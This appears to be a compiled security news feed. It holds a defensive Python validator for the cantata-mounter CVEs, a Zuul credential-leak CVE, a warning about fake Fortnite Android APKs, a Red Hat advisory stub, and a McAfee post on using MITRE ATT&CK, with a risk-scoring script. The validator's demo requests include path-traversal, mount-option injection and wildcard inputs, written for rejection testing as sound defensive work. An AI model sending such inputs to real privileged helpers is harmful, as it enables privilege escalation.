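The three cantata-mounter entries (CVE-2018-12559, CVE-2018-12561 and CVE-2018-12562) describe one privileged D-Bus helper failing three input checks: a mount target that escapes /home via `..` sequences, mount options injected through the samba URL's domain parameter, and shell wildcard expansion because a wrapper script forwards arguments through the shell. The following Python is an added example of how such a helper can validate a request, not Cantata's `mpOk()` or any of its real code: the home root, the allowed character sets and the argv layout are assumptions chosen for the illustration.

```python
import os
import re
import subprocess

HOME_ROOT = "/home"
# One path component: no "..", no shell metacharacters such as "*", no option separators.
SAFE_SEGMENT = re.compile(r"[A-Za-z0-9._ -]+")
# Values that end up inside the comma-separated -o string (user, domain): no "," or "=".
SAFE_OPTION_VALUE = re.compile(r"[A-Za-z0-9._-]+")
# UNC share: //server/share, same restricted alphabet.
SAFE_SHARE = re.compile(r"//[A-Za-z0-9._-]+/[A-Za-z0-9._ -]+")


def check_mount_point(path: str, home_root: str = HOME_ROOT):
    """Return (True, canonical_path) or (False, reason).

    Lexical containment check for CVE-2018-12559: normalise the path, require it to
    lie strictly below home_root, and allow only plain characters in every segment
    (which also rejects the "*" of CVE-2018-12562 at the input layer). A real
    privileged service should additionally realpath() the parent directory on the
    live filesystem so a symlink inside /home cannot point outside it.
    """
    if not path.startswith("/"):
        return False, "mount point must be an absolute path"
    norm = os.path.normpath(path)                 # collapses "/home/a/../../sys" -> "/sys"
    rel = os.path.relpath(norm, home_root)        # "../sys" when outside, "." when equal
    if rel == "." or rel.startswith(".."):
        return False, f"{norm} is outside {home_root}"
    for segment in rel.split("/"):
        if not SAFE_SEGMENT.fullmatch(segment):
            return False, f"disallowed path component {segment!r}"
    return True, norm


def check_option_value(value: str, what: str):
    """Reject user/domain values that could smuggle extra mount options (CVE-2018-12561)."""
    if not SAFE_OPTION_VALUE.fullmatch(value):
        return False, f"{what} contains characters that could inject mount options"
    return True, value


def build_mount_argv(share: str, mount_point: str, user: str, domain: str):
    """Validate every field and return (True, argv) or (False, reason).

    argv is a list, never a shell string: passing it to subprocess with shell=False
    means no wildcard or metacharacter is ever interpreted (CVE-2018-12562).
    """
    if not SAFE_SHARE.fullmatch(share):
        return False, "share must look like //server/share"
    ok, mp = check_mount_point(mount_point)
    if not ok:
        return False, mp
    for value, what in ((user, "user"), (domain, "domain")):
        ok, reason = check_option_value(value, what)
        if not ok:
            return False, reason
    return True, ["mount.cifs", share, mp, "-o", f"user={user},domain={domain}"]


def run_mount(argv):
    """Execute the validated argv directly (no shell). Needs privileges; not run in tests."""
    return subprocess.run(argv, shell=False, check=False).returncode


if __name__ == "__main__":
    for request in [
        ("//nas/share", "/home/alice/nas", "alice", "WORKGROUP"),
        ("//nas/share", "/home/alice/../../sys/kernel", "alice", "WORKGROUP"),
        ("//nas/share", "/home/alice/nas", "alice", "WORKGROUP,file_mode=0777"),
        ("//nas/share", "/home/alice/tmp/*", "alice", "WORKGROUP"),
    ]:
        print(request[1], request[3], "->", build_mount_argv(*request))
```

The same containment check applies to the unmount path of CVE-2018-12560: a target that does not normalise to a location strictly below the home root is refused before any privileged operation runs.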

CVE-2018-12557

An issue was discovered in Zuul 3.x before 3.1.0. If nodes become offline during the build, the no_log attribute of a task is ignored. If the unreachable error occurred in a task used with a loop variable (e.g., with_items), the contents of the loop items would be printed in the console. This could lead to accidentally leaking credentials or secrets.

Security Affairs: Don’t install Fortnite Android APK because it could infect your mobile device

Fortnite is currently the most popular game, and crooks are attempting to exploit interest in the forthcoming Fortnite Android release to infect millions of fans.

No doubt, Fortnite is currently the most popular game; it is a co-op sandbox survival game developed by Epic Games and People Can Fly.

The game was released as a paid-for early access title for Microsoft Windows, macOS, PlayStation 4 and Xbox One on July 25, 2017, with a full free-to-play release in 2018.

The Fortnite game has now more than 125 million active users.

The great success of Fortnite has attracted cyber criminals who are attempting to exploit its popularity to target the fans.

Unfortunately for Android users, Fortnite for Android devices is not available yet; it is currently under development, while the iOS version was released in March by Epic Games.


The company announced that the Battle Royale game is planned to be released for Android devices this summer.

In recent weeks, crooks have attempted to take advantage of Android users’ interest in an alleged version of the popular game for their devices.

Surfing online, it is quite easy to find blog posts and video tutorials with instructions to install fake Fortnite Android apps.

I spent an entire week explaining to my son and his friends the risks of installing APKs from untrusted sources; believe me … it was the unique real battle royale of this story 🙂

Just searching for ‘Fortnite Android App’ on YouTube yields an impressive number of videos on “How to install Fortnite on Android”; many of these videos have been viewed millions of times and also include links to actual Fortnite APK files.


A growing number of users are searching for Fortnite Android, as reported by Google Trends:


Scammers are exploiting this interest to trick Android fans into downloading tainted versions of the game that can compromise Android devices.

Some video tutorials that appeared online recommend that Android users “install a few other apps” to unlock the Android Fortnite game. These apps could hide any kind of code, from cryptocurrency miners to apps used to generate revenue for their developers.

An impressive number of links that purport to be official Fortnite app downloads are used by crooks to deliver malicious applications.

If you are a fan of the Fortnite game, you have to wait until next summer for the official Android version; in the meantime, don’t install alleged beta versions of the popular game from third-party stores.

Even if you see a Fortnite Android version in the official Google Play store, do not download it; unfortunately, scammers are able to deploy fake apps on the official store as well.

Pierluigi Paganini

(Security Affairs – Fortnite Android, malware)

The post Don’t install Fortnite Android APK because it could infect your mobile device appeared first on Security Affairs.


RedHat: RHSA-2018-1932:01 Moderate: zsh security update

LinuxSecurity.com: An update for zsh is now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from

Apply MITRE’s ‘ATT&CK’ Model to Check Your Defenses

Every week we read about adversaries attacking their targets as part of online criminal campaigns. Information gathering, strategic advantage, and theft of intellectual property are some of the motivations. Besides these, we have seen during the past two years an increase in attacks in which adversaries are not shy of leaving a trail of destruction. One might wonder how to deal with these kinds of threats and where to start.

Sun Tzu’s The Art of War contains some great wisdom regarding the strategy of warfare. One of the most popular is the advice “If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle.”

Applying this advice to information security, let’s focus first on knowing yourself. Knowing yourself can roughly be divided into two parts:

  • What do I have that can be of value to an attacker?
  • How do I detect, protect, and correct any threats to my identified value?

Every company has something of value, and it takes only one criminal mind to see that and attempt to exploit it. Ask yourself what the core of your business is, the secret sauce that people might be after, what would take you out of business, whom you are doing business with, who your clients are, etc.

Once you have identified your organization’s value, the second part of knowing yourself comes into play. You must understand where to focus your defenses and invest in technology to detect and protect against threats.

After wrapping up the knowing yourself part, what can we learn from the enemy? Ask yourself “Who would likely be interested in attacking me?” By going through the list of known adversaries and cybercriminal groups, you can create a list based on which geographies and vectors they target and classify them by risk. Here is a simplified example:

Once you have your list and risk classification ready, you must next study the tactics, techniques, and procedures used by these adversaries. For mapping their techniques and associated campaigns, we use the MITRE Adversarial Tactics, Techniques, and Common Knowledge model (ATT&CK). The matrix covers hundreds of techniques, and can be applied for different purposes. In this case, we will focus on the risk versus mapping the defensive architecture.

In Q1 of 2018, we mapped the targeted attacks discovered by ourselves and our peers in the industry. The following example comes from one adversary we tracked, showing the techniques they used:

With MITRE’s Navigator tool you can select an actor or malware family. After making the selection, the boxes in the matrix show which techniques the actor or malware has used.

From these techniques we can learn how our environments protect against these techniques and where we have gaps. The goal is not to create coverage or signatures for each technique; the matrix helps organizations understand how attackers behave. Having more visibility into their methods leads us to the right responses, and helps us contain and eradicate attacks in a coordinated way. By comparing the multiple actors from your initial risk assessment, you can build the matrix from the perspective of high/medium/low risk and map it against your defenses.

Although some adversaries might not have a history of attacking you and your sector, it is still good to ask yourself “What if we were a target?” Would your environment create enough visibility to detect and deal with these techniques?
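The procedure in the preceding paragraphs (list the adversaries likely to target you, classify them by risk, collect the techniques each has used, and map the result against your defenses) can be carried out with a small script. The following Python is an added example and not McAfee's tooling: the three adversary profiles, their risk tiers and the coverage map are constructed for the illustration, while the technique names are those the post uses (plus Spearphishing Attachment and PowerShell, both common in the campaigns described). The technique IDs are the 2018-era ATT&CK IDs for those names, and the output dictionary follows the shape of a Navigator layer file so the gaps can be visualised in the tool the post mentions; the exact layer field names are as known to the author of this example, not taken from the post.

```python
import json
from collections import defaultdict

RISK_WEIGHT = {"high": 3, "medium": 2, "low": 1}

# 2018-era ATT&CK technique IDs for the names used in the post.
TECHNIQUE_IDS = {
    "Spearphishing Attachment": "T1193",
    "PowerShell": "T1086",
    "Exploitation of vulnerability": "T1068",
    "Process injection": "T1055",
    "Valid accounts": "T1078",
    "Commonly Used Port": "T1043",
    "Exfiltration Over Command and Control Channel": "T1041",
}

# Constructed adversary profiles from the "who would attack me?" exercise.
# The group names, risk tiers and technique sets are illustrative, not real attribution.
ADVERSARIES = {
    "Adversary 1": {"risk": "high", "techniques": [
        "Spearphishing Attachment", "PowerShell", "Exploitation of vulnerability",
        "Process injection", "Commonly Used Port",
        "Exfiltration Over Command and Control Channel"]},
    "Adversary 2": {"risk": "medium", "techniques": [
        "Spearphishing Attachment", "Valid accounts", "Process injection",
        "Commonly Used Port"]},
    "Adversary 3": {"risk": "low", "techniques": [
        "Valid accounts", "Exploitation of vulnerability"]},
}

# Constructed coverage map: technique -> controls in our environment that give
# visibility into it. An empty list (or a missing key) means no visibility.
COVERAGE = {
    "Spearphishing Attachment": ["mail gateway sandbox"],
    "PowerShell": ["script block logging"],
    "Process injection": ["EDR memory monitoring"],
    "Valid accounts": ["SIEM anomalous-logon rule"],
    "Exploitation of vulnerability": [],
    "Commonly Used Port": [],
    "Exfiltration Over Command and Control Channel": [],
}


def technique_priority(adversaries):
    """Score each technique by the summed risk weight of the adversaries using it."""
    scores = defaultdict(int)
    for profile in adversaries.values():
        weight = RISK_WEIGHT[profile["risk"]]
        for technique in profile["techniques"]:
            scores[technique] += weight
    return dict(scores)


def coverage_gaps(adversaries, coverage):
    """Techniques with no detecting control, highest risk-weighted score first."""
    priority = technique_priority(adversaries)
    gaps = [(t, s) for t, s in priority.items() if not coverage.get(t)]
    return sorted(gaps, key=lambda ts: (-ts[1], ts[0]))


def navigator_layer(adversaries, coverage, name="Risk-weighted coverage"):
    """Build a dict in the shape of an ATT&CK Navigator layer (field names assumed)."""
    priority = technique_priority(adversaries)
    techniques = []
    for technique, score in sorted(priority.items()):
        controls = coverage.get(technique) or []
        techniques.append({
            "techniqueID": TECHNIQUE_IDS[technique],
            "score": score,
            "comment": ("covered by " + ", ".join(controls)) if controls else "GAP",
        })
    return {"name": name, "domain": "mitre-enterprise", "techniques": techniques}


if __name__ == "__main__":
    for technique, score in coverage_gaps(ADVERSARIES, COVERAGE):
        print(f"GAP score={score}: {technique} ({TECHNIQUE_IDS[technique]})")
    print(json.dumps(navigator_layer(ADVERSARIES, COVERAGE), indent=2))
```

With this data the top gap is outbound traffic on common ports, which is exactly the Exfiltration and Command and Control finding in the Statistics section below: a technique used by several adversaries with no inspecting control outranks a technique used only by the highest-risk group.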

Statistics

When we looked at the first quarter, we noticed that the following three techniques were the most popular in the category of Privilege Escalation:

  • Exploitation of vulnerability
  • Process injection
  • Valid accounts

To determine your coverage and detection capacity, you should ask if the exploits used completely new vulnerabilities (no patches available) or if they had existed for a while. Would your environment have the right patches installed or are you missing them and have to take action?

When we looked at the categories of Exfiltration and Command and Control, most campaigns exfiltrated their data over a control server channel using a common port. That translates to either TCP port 80 (HTTP) or TCP port 443 (HTTPS). We all use these ports from inside the network to communicate with the internet. What if all my other defenses failed to discover the suspicious activity? Which defensive components in my network would be able to inspect the outgoing traffic and block or flag the exfiltration attempts?

Conclusion

In this post, we highlighted one approach and application of the ATT&CK model. There are many ways to apply it for red teaming, threat hunting, and other tasks. At McAfee we embrace the model and are applying it at different levels and for different purposes in our organization. We not only use it but also contribute to the model by describing newly discovered techniques used by adversaries.

The post Apply MITRE’s ‘ATT&CK’ Model to Check Your Defenses appeared first on McAfee Blogs.

McAfee Blogs